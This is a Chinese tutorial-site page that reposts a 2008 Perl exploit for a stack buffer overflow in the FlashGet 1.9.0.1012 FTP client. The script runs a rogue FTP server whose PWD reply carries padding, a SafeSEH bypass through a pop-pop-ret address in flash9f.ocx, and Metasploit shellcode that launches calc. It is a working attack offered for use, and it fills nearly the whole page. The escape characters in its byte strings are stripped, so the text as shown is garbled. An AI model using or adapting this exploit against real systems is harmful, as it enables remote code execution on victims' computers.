首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >Exploit >FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
摘要:#!/usr/bin/perl#k`sOSe08/17/2008#bypasssafesehusingflash9f.ocx.usewarn...

#!/usr/bin/perl

# k`sOSe 08/17/2008

# bypass safeseh using flash9f.ocx. use warnings;

use strict;

use IO::Socket; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

my $shellcode =

"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".

"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".

"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".

"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".

"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".

"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".

"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".

"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".

"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".

"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";

my $sock = IO::Socket::INET->new( LocalAddr => '0.0.0.0', LocalPort => '21', Listen => 1, Reuse => 1); while(my $csock = $sock->accept())

{ print $csock "220 Hello ;)rn";

read_sock($csock); print $csock "331 pwd pleasern";

read_sock($csock); print $csock "230 OKrn";

read_sock($csock); print $csock "250 CWD command successful.rn";

read_sock($csock); print $csock "257 " . "x22" .

"x41" x 324 . "xEBx06x90x90" . # jump ahead

"x82x01x02x30" . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH ;) $shellcode . "x90" x 840 .

"x22" .

" is current directory.rn"; close($csock);

exit;

} sub read_sock

{

my ($sock) = @_; my $buf = <$sock>; print "[client] -> $buf"; }

【FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)】相关文章:

Dana IRC 1.4a Remote Buffer Overflow Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

上一篇: webEdition CMS (we_objectID) Blind SQL Injection Exploit
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新Exploit学习
热门Exploit学习